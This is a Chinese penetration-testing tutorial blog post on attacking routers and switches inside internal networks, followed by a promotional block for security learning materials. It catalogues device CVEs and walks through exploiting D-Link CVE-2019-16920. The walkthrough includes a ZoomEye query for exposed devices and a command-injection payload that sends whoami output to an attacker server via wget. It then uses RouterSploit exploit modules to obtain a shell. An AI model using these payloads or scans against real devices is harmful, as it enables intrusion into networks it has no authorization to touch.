【内网渗透】网络设备漏洞

简介:提到网络设备大家应该都不陌生,不论是小型局域网,还是公司办公网等,只要是涉及网络的都会有网络设备的存在。网络设备包括中继器、网桥、路由器、网关、防火墙、交换机等设备,在内网攻击中,我们不仅要对操作系统、数据库等进行攻击,还要对网络设备进行漏洞攻击,在这一节主要介绍路由器、交换机和安全设备的一些常见漏洞,让大家能够掌握更多的内网攻击的攻击面。

1、路由器漏洞

说明:随着信息时代的到来,路由器是内部网络中必不可少的设备。如果路由器存在漏洞,这将大大影响整个网络系统的安全性,同时也对用户的隐私造成极大威胁。

路由器基本都是基于Linux系统的,架构以MIPS和ARM为主,大部分含有Telnet服务,也会有很多基础命令以Busybox的方式实现,如cat、chmod、date、echo、ifconfig、ls、kill等,当然为了方便用户管理调试,现在越来越多的网络设备还会有Web配置界面。

1.路由器常见漏洞

路由器常见的漏洞有很多,下面列举一些在内网攻击中使用的漏洞,通常为命令执行漏洞、拒绝服务漏洞、未授权访问漏洞和自带后门漏洞这四种类型。

1)命令执行漏洞

TP-Link SR20本地网络远程代码执行漏洞、Dir-890l命令执行漏洞、腾达AC15远程代码执行漏洞(CVE-2018-5767)、D-Link DIR-859远程代码执行漏洞(CVE-2019-17621)。

2)拒绝服务漏洞

TP-Link WR886N V7 Inetd Task Dos、Cisco-ASA-拒绝服务漏洞(CVE-2018-0296)。

3)未授权访问漏洞

腾达某型号路由器后台登录认证、电信光猫HG2821T-U未授权导致信息泄露、D-Link多型号路由器存在任意文件下载漏洞、某些型号的Comba和D-Link路由器存在管理员密码泄露漏洞等。

4)自带后门漏洞

思科路由器SYNful Knock后门程序、Belkin SURF路由器后门、Tenda路由器后门等。

路由器漏洞危害:

当然路由器除了可能存在直接影响安全的漏洞外,还可能存在弱口令的问题,如Web管理后台弱口令、23端口弱口令等。攻克路由器后可以做DNS劫持、蠕虫病毒、ARP欺骗、网络拓扑、流量转发、放置后门等操作。

2.路由器典型漏洞演示

现在介绍一下路由器漏洞CVE-2019-16920。2019年9月,Fortinet FortiGuard实验室发现并报告了D-Link产品中存在一个非认证的命令注入漏洞:CVE-2019-16920,该漏洞可造成远程代码执行。受影响的产品有DIR-655、DIR-866L、DIR-652、DHP-1565、DIR-855L、DAP-1533、DIR-862L、DIR-615、DIR-835、DIR-825等。

通过zoomeye搜索引擎查找网上暴露的存在漏洞设备:

DIR-825 +port:“8080”

该漏洞源于一个失败的身份认证检查,当要进入管理页面时,需要执行登录操作:

洞产生的原因是参数“ping_ipaddr”执行命令注入,虽然响应是跳转到登录页面,但操作“ping_test”仍然执行。

先在外网服务器开启端口监听,用于接收目标的回显信息:

nc -lvvp 9980

修改请求包,将请求内容改为以下payload执行查看当前用户命令:

html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://服务器ip:9980/?$(whoami)&=

发送请求包后外网攻击机收到命令执行回显:

当然这个漏洞不只这一种利用方式,还可以让攻击者检索管理员密码,或将自己的后门安装到服务器上等。

3. 路由器渗透工具RouterSploit

工具在kali系统安装:

apt-get install python3-pip

git clone https://www.github.com/threat9/routersploit

cd routersploit

python3 -m pip install -r requirements.txt

python3 rsf.py

搭建流量隧道进入目标内网后使用RouterSploit工具对目标内网路由器进行漏洞扫描:

proxychains python3 rsf.py

//使用自动扫描模块

use scanners/autopwn

对192.168.0.100这个网络设备进行自动扫描:

set target 192.168.0.100

run

扫描出这个设备存在漏洞并推荐使用的漏洞利用模块,但不一定准确也可以自己查找漏洞利用模块:

自己选择使用漏洞利用模块并配置攻击目标:

use exploits/routers/netgear/multi_rce

set target 192.168.0.100

执行 run 命令,攻击成功后返回一个交互式shell界面可以执行命令:

2、交换机漏洞

说明:交换机在企业网中占有重要的地位,通常是整个网络的核心所在,这一地位使它成为黑客入侵和病毒肆虐的重点对象。常用的交换机品牌有华为交换机、H3C交换机、思科交换机、TP-LINK交换机、锐捷交换机、D-Link交换机、NETGEAR交换机、中兴交换机等,下面例举一些交换机漏洞。

(1)命令执行漏洞

Cisco Smart Install远程命令执行漏洞(CVE-2018-0171)、HP 2910al-48G任意命令执行漏洞、信锐WAC命令执行漏洞。

(2)未授权漏洞

Cisco CatOS密码提示未授权远程命令执行漏洞、Cisco Small Business 220 Series Smart Plus Switches未授权访问漏洞。

(3)拒绝服务漏洞

MOXA EDS-405A工业交换机拒绝服务漏洞、H3C S5120V2-SI系列交换机拒绝服务漏洞、H3C S5000PV3-EI系列以太网交换机拒绝服务漏洞。

(4)其他类型漏洞

Huawei OceanStor SNS3096信息泄露漏洞、H3C ACG1000-M交换机存在弱口令漏洞。

交换机漏洞危害:

黑客攻破交换机后,可以进行的攻击有VLAN跳跃攻击、生成树攻击、MAC表洪水攻击、ARP攻击、VTP攻击、挂马、端口镜像、流量污染等。

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

读者福利 | 优快云大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

在这里插入图片描述

1.网络安全学习路线图

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

在这里插入图片描述

读者福利 | 优快云大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值